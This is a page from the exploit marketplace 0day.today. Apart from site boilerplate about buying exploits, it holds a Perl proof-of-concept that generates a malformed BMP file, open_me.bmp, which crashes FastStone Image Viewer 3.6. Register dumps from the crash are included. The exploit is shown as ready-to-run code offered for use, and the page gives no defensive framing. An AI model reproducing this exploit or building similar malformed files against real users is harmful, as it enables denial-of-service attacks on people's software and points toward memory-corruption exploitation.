0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FastStone Image Viewer 3.6 (malformed bmp image) Crash Exploit
============================================================== FastStone Image Viewer 3.6 (malformed bmp image) Crash Exploit ============================================================== Name : FastStone Image Viewer v3.6 (malformed bmp image) DoS Exploit Credit : suN8Hclf (DaRk-CodeRs Group), crimson.loyd@gmail.com Download: : http://www.FastStone.org Greetz : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, Katharsis, all from #dark-coders and others;] PoC: #!/usr/local/bin/perl # Open file (File->Open) or simply click on the image miniature # FastStone Image Viewer v3.6 simply crashes # Tested on Windows 2000 SP4 #-----INFO---------------------- #EAX 00002847 #ECX 00000000 #EDX 00402818 dumped_F.00402818 #EBX 00402818 dumped_F.00402818 #ESP 00402818 dumped_F.00402818 #EBP 0012DF08 #ESI 00402818 dumped_F.00402818 #EDI 000161E8 #EIP 012F0447 # #Reason: "Access violation when writing to [00002847] #-----INFO---------------------- my $code="\x42\x4d\x3c\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00". "\x00\x00\xcc\x5f\x01\x00\xe8\x61\x01\x00\x01\x00\x18\x00\x00\x00". "\x00\x00\x06\x00\x00\x00\x98\x9e\x00\x00\x88\x77\x00\x00\xff\x02". "\xfd\x00\x00\x00\x00\x00\x41"; my $file="open_me.bmp"; open(my $FILE, ">>$file") or die "[!]Cannot open file"; print $FILE $code; close($FILE); print "$file has been generated\n" print "Credit: suN8Hclf, www.dark-coders.pl" # 0day.today [2024-12-24] #